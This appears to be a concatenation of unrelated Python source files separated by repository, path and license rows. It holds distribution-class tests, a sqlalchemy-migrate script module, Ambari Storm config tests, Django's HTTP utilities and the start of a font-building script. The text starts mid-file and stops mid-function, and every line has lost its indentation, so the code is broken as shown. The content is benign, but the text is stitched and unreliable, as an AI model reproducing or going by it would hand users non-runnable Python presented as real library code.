Tests ``ProductDistribution``
"""
## TEST METHODS ##
def test_product_moments(self):
"""
Distributions: Checks that product distributions
have the right moments.
"""
dist1 = NormalDistribution(0,1)
dist2 = MultivariateNormalDistribution(np.array([1,2]),np.array([[2,0],[0,3]]))
dist = ProductDistribution(dist1, dist2)
samples = dist.sample(100000)
assert_almost_equal(np.round(np.mean(samples, axis=0)), np.array([0,1,2]))
assert_almost_equal(np.round(np.var(samples[:,0])), 1)
assert_almost_equal(np.round(np.var(samples[:,1])), 2)
assert_almost_equal(np.round(np.var(samples[:,2])), 3)
def test_product_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist1 = NormalDistribution(0,1)
dist2 = MultivariateNormalDistribution(np.array([1,2]),np.array([[2,0],[0,3]]))
dist = ProductDistribution(dist1, dist2)
assert(dist.n_rvs == 3)
class TestSingleSampleMixin(DerandomizedTestCase):
"""
Tests ``SingleSampleMixin``
"""
## TEST METHODS ##
def test_single_sample_mixin(self):
"""
Distributions: Tests that subclassing from
SingleSampleMixin works.
"""
class TestDist(SingleSampleMixin, Distribution):
def __init__(self, dist):
super(TestDist, self).__init__()
self._dist = dist
@property
def n_rvs(self):
return self._dist.n_rvs
def _sample(self):
return self._dist.sample(n=1)
dist1 = TestDist(NormalDistribution(0,1))
dist2 = TestDist(MultivariateNormalDistribution(np.array([1,2]),np.array([[2,0],[0,3]])))
sample1 = dist1.sample(500)
sample2 = dist2.sample(500)
assert(sample1.shape == (500,1))
assert(sample2.shape == (500,2))
assert_almost_equal(np.round(np.mean(sample1,axis=0)), 0)
assert_almost_equal(np.round(np.mean(sample2,axis=0)), np.array([1,2]))
class TestHaarUniform(DerandomizedTestCase):
"""
Tests ``HaarUniform``
"""
## TEST METHODS ##
def test_haar_state_mean(self):
"""
Distributions: Checks that HaarUniform
has the correct mean.
"""
dist = HaarUniform()
samples = dist.sample(1000)
x = np.mean(samples[:,0]) * np.array([[0,1],[1,0]])
y = np.mean(samples[:,1]) * np.array([[0,-1j],[1j,0]])
z = np.mean(samples[:,2]) * np.array([[1,0],[0,1]])
rho = x + y + z
assert_almost_equal(rho, np.zeros((2,2)), 2)
def test_haar_state_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = HaarUniform()
assert(dist.n_rvs == 3)
class TestMixtureDistribution(DerandomizedTestCase):
"""
Tests ``MixtureDistribution``
"""
## TEST METHODS ##
def test_mixture_moments(self):
"""
Distributions: Checks that MixtureDistributions
has the correct mean value for the normal
distrubution under both input formats.
"""
weights = np.array([0.25, 0.25, 0.5])
means = np.array([1,2,3])
vars = np.array([.5, .2, .8])
dist_list = [
NormalDistribution(means[idx], vars[idx])
for idx in range(3)
]
# Test both input formats
mix1 = MixtureDistribution(weights, dist_list)
mix2 = MixtureDistribution(weights, NormalDistribution,
dist_args=np.vstack([means,vars]).T)
# Also test with kwargs
mix3 = MixtureDistribution(weights, NormalDistribution,
dist_args=np.vstack([means,vars]).T,
dist_kw_args={'trunc': np.vstack([means-vars/5,means+vars/5]).T})
# Also test without the shuffle
mix4 = MixtureDistribution(weights, dist_list, shuffle=False)
s1 = mix1.sample(150000)
s2 = mix2.sample(150000)
s3 = mix3.sample(150000)
s4 = mix4.sample(150000)
# The mean should be the weighted means.
assert_almost_equal(s1.mean(), np.dot(weights, means), 2)
assert_almost_equal(s2.mean(), np.dot(weights, means), 2)
assert_almost_equal(s3.mean(), np.dot(weights, means), 2)
assert_almost_equal(s4.mean(), np.dot(weights, means), 2)
# The variance should be given by the law of total variance
assert_almost_equal(
np.var(s1),
np.dot(weights, vars) + np.dot(weights, means**2) - np.dot(weights, means)**2,
1
)
assert_almost_equal(
np.var(s2),
np.dot(weights, vars) + np.dot(weights, means**2) - np.dot(weights, means)**2,
1
)
# Skip the variance test for s3 because truncation messes with it.
assert_almost_equal(
np.var(s4),
np.dot(weights, vars) + np.dot(weights, means**2) - np.dot(weights, means)**2,
1
)
def test_mixture_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
weights = np.array([0.25, 0.25, 0.5])
means = np.array([1,2,3])
vars = np.array([.5, .2, .8])
dist_list = [
NormalDistribution(means[idx], vars[idx])
for idx in range(3)
]
dist = MixtureDistribution(weights, dist_list)
assert(dist.n_rvs == 1)
weights = np.array([0.25, 0.25, 0.5])
means = np.array([[1,0],[2,0],[3,1]])
vars = np.array([[[1,0.2],[0.2,2]],[[3,0.2],[0.2,2]],[[2,0.2],[0.2,2]]])
dist_list = [
MultivariateNormalDistribution(means[idx], vars[idx])
for idx in range(3)
]
dist = MixtureDistribution(weights, dist_list)
assert(dist.n_rvs == 2)
class TestParticleDistribution(DerandomizedTestCase):
"""
Tests ``ParticleDistribution``
"""
## TEST METHODS ##
def test_init(self):
"""
Distributions: Checks that ParticleDistributions
initialized correctly in different circumstances.
"""
dim = 5
n_particles = 100
# note that these weights are not all positive!
particle_weights = np.random.randn(dim)
particle_weights = particle_weights
particle_locations = np.random.rand(n_particles, dim)
dist1 = ParticleDistribution(n_mps=dim)
dist2 = ParticleDistribution(
particle_weights=particle_weights,
particle_locations=particle_locations
)
assert(dist1.n_particles == 1)
assert(dist1.n_rvs == dim)
assert_almost_equal(dist1.sample(3), np.zeros((3, dim)))
assert_almost_equal(np.sum(dist1.particle_weights), 1)
assert(dist2.n_particles == n_particles)
assert(dist2.n_rvs == dim)
assert(dist2.sample(3).shape == (3,dim))
# the following demands that ParticleDistribution
# retcifies and normalizes whichever weights it is given
assert_almost_equal(np.sum(dist2.particle_weights), 1)
def test_ness(self):
"""
Distributions: Tests the n_ess property of the
ParticleDistribution.
"""
dim = 5
n_particles = 100
particle_weights1 = np.ones(n_particles) / n_particles
particle_weights2 = np.zeros(n_particles)
particle_weights2[0] = 1
particle_weights3 = np.random.rand(dim)
particle_weights3 = particle_weights3 / np.sum(particle_weights3)
particle_locations = np.random.rand(n_particles, dim)
dist1 = ParticleDistribution(
particle_weights=particle_weights1,
particle_locations=particle_locations
)
dist2 = ParticleDistribution(
particle_weights=particle_weights2,
particle_locations=particle_locations
)
dist3 = ParticleDistribution(
particle_weights=particle_weights3,
particle_locations=particle_locations
)
assert_almost_equal(dist1.n_ess, n_particles)
assert_almost_equal(dist2.n_ess, 1)
assert(dist3.n_ess < n_particles and dist3.n_ess > 1)
def test_moments(self):
"""
Distributions: Tests the moment function (est_mean, etc)
of ParticleDistribution.
"""
dim = 5
n_particles = 100000
# draw particles from a randomly chosen mutivariate normal
mu = np.random.randn(dim)
cov = np.random.randn(dim,dim)
cov = np.dot(cov,cov.T)
particle_locations = np.random.multivariate_normal(mu, cov, n_particles)
particle_weights = np.random.rand(n_particles)
dist = ParticleDistribution(
particle_weights=particle_weights,
particle_locations=particle_locations
)
assert_sigfigs_equal(mu, dist.est_mean(), 1)
assert_almost_equal(dist.est_meanfn(lambda x: x**2),np.diag(cov) + mu**2, 0)
assert(np.linalg.norm(dist.est_covariance_mtx() - cov) < 0.5)
def test_entropy(self):
"""
Distributions: Tests the entropy and related functions of
ParticleDistributions.
"""
dim = 3
n_particles = 100
# draw particles from a randomly chosen mutivariate normal
mu = np.random.randn(dim)
cov = np.random.randn(dim,dim)
cov = np.dot(cov,cov.T)
particle_locations = np.random.multivariate_normal(mu, cov, n_particles)
particle_weights1 = np.ones(n_particles)
particle_weights2 = np.random.rand(n_particles)
dist1 = ParticleDistribution(
particle_weights=particle_weights1,
particle_locations=particle_locations
)
dist2 = ParticleDistribution(
particle_weights=particle_weights2,
particle_locations=particle_locations
)
assert_almost_equal(dist1.est_entropy(), np.log(n_particles))
#TODO: test that est_kl_divergence does more than not fail
dist1.est_kl_divergence(dist2)
def test_clustering(self):
"""
Distributions: Tests that clustering works.
"""
dim = 3
n_particles = 1000
# make two multivariate normal clusters
mu1 = 50+np.zeros(dim)
mu2 = -50+np.zeros(dim)
cov = np.random.randn(dim,dim)
cov = np.dot(cov,cov.T)
particle_locations = np.concatenate([
np.random.multivariate_normal(mu1, cov, int(n_particles/2)),
np.random.multivariate_normal(mu2, cov, int(n_particles/2))
])
particle_weights = np.ones(n_particles)
dist = ParticleDistribution(
particle_weights=particle_weights,
particle_locations=particle_locations
)
# TODO: do more than check these don't fail (I didn't have time
# to figure out the undocumented code.)
dist.est_cluster_moments()
dist.est_cluster_covs()
dist.est_cluster_metric()
class TestInterpolatedUnivariateDistribution(DerandomizedTestCase):
"""
Tests ``InterpolatedUnivariateDistribution``
"""
def test_interp_moments(self):
"""
Distributions: Checks that the interpolated distribution
has the right moments.
"""
# Interpolate the normal distribution because we
# know the moments
dist = InterpolatedUnivariateDistribution(
scipy.stats.norm.pdf, 1, 1500
)
samples = dist.sample(40000)
assert_almost_equal(1, samples.var(), 1)
assert_almost_equal(0, samples.mean(), 1)
def test_interp_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = InterpolatedUnivariateDistribution(
scipy.stats.norm.pdf, 1, 1500
)
assert(dist.n_rvs == 1)
class TestPostselectedDistribution(DerandomizedTestCase):
"""
Tests ``PostselectedDistribution``
"""
def test_postselected_validity(self):
"""
Distributions: Checks that the postselected
samples are valid.
"""
ud = NormalDistribution(0, 1)
class FakeModel(object):
def are_models_valid(self, mps):
return mps >= 0
dist = PostselectedDistribution(
ud, FakeModel()
)
samples = dist.sample(40000)
assert_array_less(0, samples)
def test_postselected_fails(self):
"""
Distributions: Checks that the postselected
fails to generate enough points with a
difficult constraint.
"""
ud = NormalDistribution(0, 1)
class FakeModel(object):
def are_models_valid(self, mps):
return mps >= 1000
dist = PostselectedDistribution(
ud, FakeModel(), 30
)
self.assertRaises(
RuntimeError,
dist.sample,
10000
)
def test_postselected_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
ud = NormalDistribution(0, 1)
class FakeModel(object):
def are_models_valid(self, mps):
return mps >= 1000
dist = PostselectedDistribution(
ud, FakeModel(), 30
)
assert(dist.n_rvs == 1)
class TestConstrainedSumDistribution(DerandomizedTestCase):
"""
Tests ``ConstrainedSumDistribution``
"""
def test_constrained_sum_constraint(self):
"""
Distributions: Tests that the contstraint is met in
the constrained sum distribution.
"""
unif = UniformDistribution([[0,1],[0,2]])
dist = ConstrainedSumDistribution(unif, 3)
samples = dist.sample(1000)
assert_almost_equal(
np.sum(samples, axis=1),
3 * np.ones(1000)
)
def test_constrained_sum_moments(self):
"""
Distributions: Tests that the contstraint is met in
the constrained sum distribution.
"""
unif = UniformDistribution([[0,1],[0,1]])
dist = ConstrainedSumDistribution(unif, 1)
samples = dist.sample(100000)
assert_sigfigs_equal(np.array([1/2]*2), np.mean(samples, axis=0), 2)
def test_constrained_sum_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
unif = UniformDistribution([[0,1],[0,2]])
dist = ConstrainedSumDistribution(unif, 3)
assert(dist.n_rvs == 2)
| agpl-3.0 |
VagrantApe/flaskMicroblog | venv/lib/python2.7/site-packages/migrate/versioning/script/py.py | 65 | 5483 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import shutil
import warnings
import logging
import inspect
from StringIO import StringIO
import migrate
from migrate.versioning import genmodel, schemadiff
from migrate.versioning.config import operations
from migrate.versioning.template import Template
from migrate.versioning.script import base
from migrate.versioning.util import import_path, load_model, with_engine
from migrate.exceptions import MigrateDeprecationWarning, InvalidScriptError, ScriptError
log = logging.getLogger(__name__)
__all__ = ['PythonScript']
class PythonScript(base.BaseScript):
"""Base for Python scripts"""
@classmethod
def create(cls, path, **opts):
"""Create an empty migration script at specified path
:returns: :class:`PythonScript instance <migrate.versioning.script.py.PythonScript>`"""
cls.require_notfound(path)
src = Template(opts.pop('templates_path', None)).get_script(theme=opts.pop('templates_theme', None))
shutil.copy(src, path)
return cls(path)
@classmethod
def make_update_script_for_model(cls, engine, oldmodel,
model, repository, **opts):
"""Create a migration script based on difference between two SA models.
:param repository: path to migrate repository
:param oldmodel: dotted.module.name:SAClass or SAClass object
:param model: dotted.module.name:SAClass or SAClass object
:param engine: SQLAlchemy engine
:type repository: string or :class:`Repository instance <migrate.versioning.repository.Repository>`
:type oldmodel: string or Class
:type model: string or Class
:type engine: Engine instance
:returns: Upgrade / Downgrade script
:rtype: string
"""
if isinstance(repository, basestring):
# oh dear, an import cycle!
from migrate.versioning.repository import Repository
repository = Repository(repository)
oldmodel = load_model(oldmodel)
model = load_model(model)
# Compute differences.
diff = schemadiff.getDiffOfModelAgainstModel(
model,
oldmodel,
excludeTables=[repository.version_table])
# TODO: diff can be False (there is no difference?)
decls, upgradeCommands, downgradeCommands = \
genmodel.ModelGenerator(diff,engine).genB2AMigration()
# Store differences into file.
src = Template(opts.pop('templates_path', None)).get_script(opts.pop('templates_theme', None))
f = open(src)
contents = f.read()
f.close()
# generate source
search = 'def upgrade(migrate_engine):'
contents = contents.replace(search, '\n\n'.join((decls, search)), 1)
if upgradeCommands:
contents = contents.replace(' pass', upgradeCommands, 1)
if downgradeCommands:
contents = contents.replace(' pass', downgradeCommands, 1)
return contents
@classmethod
def verify_module(cls, path):
"""Ensure path is a valid script
:param path: Script location
:type path: string
:raises: :exc:`InvalidScriptError <migrate.exceptions.InvalidScriptError>`
:returns: Python module
"""
# Try to import and get the upgrade() func
module = import_path(path)
try:
assert callable(module.upgrade)
except Exception, e:
raise InvalidScriptError(path + ': %s' % str(e))
return module
def preview_sql(self, url, step, **args):
"""Mocks SQLAlchemy Engine to store all executed calls in a string
and runs :meth:`PythonScript.run <migrate.versioning.script.py.PythonScript.run>`
:returns: SQL file
"""
buf = StringIO()
args['engine_arg_strategy'] = 'mock'
args['engine_arg_executor'] = lambda s, p = '': buf.write(str(s) + p)
@with_engine
def go(url, step, **kw):
engine = kw.pop('engine')
self.run(engine, step)
return buf.getvalue()
return go(url, step, **args)
def run(self, engine, step):
"""Core method of Script file.
Exectues :func:`update` or :func:`downgrade` functions
:param engine: SQLAlchemy Engine
:param step: Operation to run
:type engine: string
:type step: int
"""
if step > 0:
op = 'upgrade'
elif step < 0:
op = 'downgrade'
else:
raise ScriptError("%d is not a valid step" % step)
funcname = base.operations[op]
script_func = self._func(funcname)
# check for old way of using engine
if not inspect.getargspec(script_func)[0]:
raise TypeError("upgrade/downgrade functions must accept engine"
" parameter (since version 0.5.4)")
script_func(engine)
@property
def module(self):
"""Calls :meth:`migrate.versioning.script.py.verify_module`
and returns it.
"""
if not hasattr(self, '_module'):
self._module = self.verify_module(self.path)
return self._module
def _func(self, funcname):
if not hasattr(self.module, funcname):
msg = "Function '%s' is not defined in this script"
raise ScriptError(msg % funcname)
return getattr(self.module, funcname)
| bsd-3-clause |
arenadata/ambari | ambari-server/src/test/python/stacks/2.1/STORM/test_storm_base.py | 1 | 6733 | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from mock.mock import MagicMock, call, patch
import resource_management.core.source
from stacks.utils.RMFTestCase import *
import re
class TestStormBase(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "STORM/0.9.1/package"
STACK_VERSION = "2.1"
def assert_configure_default(self, confDir="/etc/storm/conf", has_metrics=False, legacy=True):
import params
self.assertResourceCalled('Directory', '/var/log/storm',
owner = 'storm',
group = 'hadoop',
mode = 0777,
create_parents = True,
cd_access='a',
)
self.assertResourceCalled('Directory', '/var/run/storm',
owner = 'storm',
group = 'hadoop',
create_parents = True,
cd_access='a',
mode=0755,
)
self.assertResourceCalled('Directory', '/hadoop/storm',
owner = 'storm',
group = 'hadoop',
create_parents = True,
cd_access='a',
mode=0755,
)
self.assertResourceCalled('Directory', confDir,
group = 'hadoop',
create_parents = True,
cd_access='a'
)
self.assertResourceCalled('File', '/etc/security/limits.d/storm.conf',
content = Template('storm.conf.j2'),
owner = 'root',
group = 'root',
mode = 0644,
)
self.assertResourceCalled('File', confDir + '/config.yaml',
owner = 'storm',
content = Template('config.yaml.j2'),
group = 'hadoop',
)
storm_yarn_content = self.call_storm_template_and_assert(confDir=confDir)
self.assertTrue(storm_yarn_content.find('_JAAS_PLACEHOLDER') == -1, 'Placeholder have to be substituted')
self.assertResourceCalled('File', confDir + '/storm-env.sh',
owner = 'storm',
content = InlineTemplate(self.getConfig()['configurations']['storm-env']['content'])
)
if has_metrics:
self.assertResourceCalled('File', confDir + '/storm-metrics2.properties',
content = Template('storm-metrics2.properties.j2'),
owner = 'storm',
group = 'hadoop',
)
self.assertResourceCalled('Link', '/usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
action = ['delete'],
)
self.assertResourceCalled('Link', '/usr/lib/storm/lib/ambari-metrics-storm-sink.jar',
action = ['delete'],
)
if legacy:
self.assertResourceCalled('Execute', 'ambari-sudo.sh ln -s /usr/lib/storm/lib/ambari-metrics-storm-sink-legacy-with-common-*.jar /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
not_if = 'ls /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
only_if = 'ls /usr/lib/storm/lib/ambari-metrics-storm-sink-legacy-with-common-*.jar',
)
else:
self.assertResourceCalled('Execute', 'ambari-sudo.sh ln -s /usr/lib/storm/lib/ambari-metrics-storm-sink-with-common-*.jar /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
not_if = 'ls /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
only_if = 'ls /usr/lib/storm/lib/ambari-metrics-storm-sink-with-common-*.jar',
)
self.assertResourceCalled('File', confDir + '/storm_jaas.conf',
action=['delete'],
)
self.assertResourceCalled('File', confDir + '/client_jaas.conf',
action=['delete'],
)
return storm_yarn_content
def assert_configure_secured(self, confDir='/etc/storm/conf'):
import params
self.assertResourceCalled('Directory', '/var/log/storm',
owner = 'storm',
group = 'hadoop',
mode = 0777,
create_parents = True,
cd_access='a',
)
self.assertResourceCalled('Directory', '/var/run/storm',
owner = 'storm',
group = 'hadoop',
create_parents = True,
cd_access='a',
mode=0755,
)
self.assertResourceCalled('Directory', '/hadoop/storm',
owner = 'storm',
group = 'hadoop',
create_parents = True,
cd_access='a',
mode=0755,
)
self.assertResourceCalled('Directory', confDir,
group = 'hadoop',
create_parents = True,
cd_access='a'
)
self.assertResourceCalled('File', '/etc/security/limits.d/storm.conf',
content = Template('storm.conf.j2'),
owner = 'root',
group = 'root',
mode = 0644,
)
self.assertResourceCalled('File', confDir + '/config.yaml',
owner = 'storm',
content = Template('config.yaml.j2'),
group = 'hadoop',
)
storm_yarn_content = self.call_storm_template_and_assert(confDir=confDir)
self.assertTrue(storm_yarn_content.find('_JAAS_PLACEHOLDER') == -1, 'Placeholder have to be substituted')
self.assertResourceCalled('File', confDir + '/storm-env.sh',
owner = 'storm',
content = InlineTemplate(self.getConfig()['configurations']['storm-env']['content'])
)
self.assertResourceCalled('TemplateConfig', confDir + '/storm_jaas.conf',
owner = 'storm',
mode = 0644
)
return storm_yarn_content
def call_storm_template_and_assert(self, confDir="/etc/storm/conf"):
import storm_yaml_utils
with RMFTestCase.env as env:
storm_yarn_temlate = storm_yaml_utils.yaml_config_template(self.getConfig()['configurations']['storm-site'])
self.assertResourceCalled('File', confDir + '/storm.yaml',
owner = 'storm',
content= storm_yarn_temlate,
group = 'hadoop'
)
return storm_yarn_temlate.get_content()
| apache-2.0 |
andreif/django | django/utils/http.py | 115 | 10153 | from __future__ import unicode_literals
import base64
import calendar
import datetime
import re
import sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import allow_lazy
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, urlencode as original_urlencode,
urlparse,
)
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = re.compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = re.compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = re.compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = str(":/?#[]@")
RFC3986_SUBDELIMS = str("!$&'()*+,;=")
PROTOCOL_TO_PORT = {
'http': 80,
'https': 443,
}
def urlquote(url, safe='/'):
"""
A version of Python's urllib.quote() function that can operate on unicode
strings. The url is first UTF-8 encoded before quoting. The returned string
can safely be used as part of an argument to a subsequent iri_to_uri() call
without double-quoting occurring.
"""
return force_text(quote(force_str(url), force_str(safe)))
urlquote = allow_lazy(urlquote, six.text_type)
def urlquote_plus(url, safe=''):
"""
A version of Python's urllib.quote_plus() function that can operate on
unicode strings. The url is first UTF-8 encoded before quoting. The
returned string can safely be used as part of an argument to a subsequent
iri_to_uri() call without double-quoting occurring.
"""
return force_text(quote_plus(force_str(url), force_str(safe)))
urlquote_plus = allow_lazy(urlquote_plus, six.text_type)
def urlunquote(quoted_url):
"""
A wrapper for Python's urllib.unquote() function that can operate on
the result of django.utils.http.urlquote().
"""
return force_text(unquote(force_str(quoted_url)))
urlunquote = allow_lazy(urlunquote, six.text_type)
def urlunquote_plus(quoted_url):
"""
A wrapper for Python's urllib.unquote_plus() function that can operate on
the result of django.utils.http.urlquote_plus().
"""
return force_text(unquote_plus(force_str(quoted_url)))
urlunquote_plus = allow_lazy(urlunquote_plus, six.text_type)
def urlencode(query, doseq=0):
"""
A version of Python's urllib.urlencode() function that can operate on
unicode strings. The parameters are first cast to UTF-8 encoded strings and
then encoded as per normal.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
return original_urlencode(
[(force_str(k),
[force_str(i) for i in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in query],
doseq)
def cookie_date(epoch_seconds=None):
"""
Formats the time to ensure compatibility with Netscape's cookie standard.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])
def http_date(epoch_seconds=None):
"""
Formats the time to match the RFC1123 date format as specified by HTTP
RFC2616 section 3.3.1.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
def parse_http_date(date):
"""
Parses a date format as specified by HTTP RFC2616 section 3.3.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Returns an integer expressed in seconds since the epoch, in UTC.
"""
# emails.Util.parsedate does the job for RFC1123 dates; unfortunately
# RFC2616 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
year = int(m.group('year'))
if year < 100:
if year < 70:
year += 2000
else:
year += 1900
month = MONTHS.index(m.group('mon').lower()) + 1
day = int(m.group('day'))
hour = int(m.group('hour'))
min = int(m.group('min'))
sec = int(m.group('sec'))
result = datetime.datetime(year, month, day, hour, min, sec)
return calendar.timegm(result.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % date), sys.exc_info()[2])
def parse_http_date_safe(date):
"""
Same as parse_http_date, but returns None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Converts a base 36 string to an ``int``. Raises ``ValueError` if the
input won't fit into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is long than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
value = int(s, 36)
# ... then do a final check that the value will fit into an int to avoid
# returning a long (#15067). The long type was removed in Python 3.
if six.PY2 and value > sys.maxint:
raise ValueError("Base36 input too large")
return value
def int_to_base36(i):
"""
Converts an integer to a base36 string
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(i, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if i > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
def urlsafe_base64_encode(s):
"""
Encodes a bytestring in base64 for use in URLs, stripping any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=')
def urlsafe_base64_decode(s):
"""
Decodes a base64 encoded string, adding back any trailing equal signs that
might have been stripped.
"""
s = force_bytes(s)
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def parse_etags(etag_str):
"""
Parses a string with one or several etags passed in If-None-Match and
If-Match headers by the rules in RFC 2616. Returns a list of etags
without surrounding double quotes (") and unescaped from \<CHAR>.
"""
etags = ETAG_MATCH.findall(etag_str)
if not etags:
# etag_str has wrong format, treat it as an opaque string then
return [etag_str]
etags = [e.encode('ascii').decode('unicode_escape') for e in etags]
return etags
def quote_etag(etag):
"""
Wraps a string in double quotes escaping contents as necessary.
"""
return '"%s"' % etag.replace('\\', '\\\\').replace('"', '\\"')
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
def is_safe_url(url, host=None):
"""
Return ``True`` if the url is a safe redirection (i.e. it doesn't point to
a different host and uses a safe scheme).
Always returns ``False`` on an empty url.
"""
if url is not None:
url = url.strip()
if not url:
return False
# Chrome treats \ completely as /
url = url.replace('\\', '/')
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
url_info = urlparse(url)
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
# In that URL, example.com is not the hostname but, a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
return ((not url_info.netloc or url_info.netloc == host) and
(not url_info.scheme or url_info.scheme in ['http', 'https']))
| bsd-3-clause |
alon/servo | tests/wpt/css-tests/css-fonts-3_dev/xhtml1/reference/support/fonts/makegsubfonts.py | 1616 | 14125 |
import os
import textwrap
from xml.etree import ElementTree
from fontTools.ttLib import TTFont, newTable
from fontTools.misc.psCharStrings import T2CharString
from fontTools.ttLib.tables.otTables import GSUB,\
ScriptList, ScriptRecord, Script, DefaultLangSys,\
FeatureList, FeatureRecord, Feature,\
LookupList, Lookup, AlternateSubst, SingleSubst
# paths
directory = os.path.dirname(__file__)
shellSourcePath = os.path.join(directory, "gsubtest-shell.ttx")
shellTempPath = os.path.join(directory, "gsubtest-shell.otf")
featureList = os.path.join(directory, "gsubtest-features.txt")
javascriptData = os.path.join(directory, "gsubtest-features.js")
outputPath = os.path.join(os.path.dirname(directory), "gsubtest-lookup%d")
baseCodepoint = 0xe000
# -------
# Features
# -------
f = open(featureList, "rb")
text = f.read()
f.close()
mapping = []
for line in text.splitlines():
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
# parse
values = line.split("\t")
tag = values.pop(0)
mapping.append(tag);
# --------
# Outlines
# --------
def addGlyphToCFF(glyphName=None, program=None, private=None, globalSubrs=None, charStringsIndex=None, topDict=None, charStrings=None):
charString = T2CharString(program=program, private=private, globalSubrs=globalSubrs)
charStringsIndex.append(charString)
glyphID = len(topDict.charset)
charStrings.charStrings[glyphName] = glyphID
topDict.charset.append(glyphName)
def makeLookup1():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup1")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
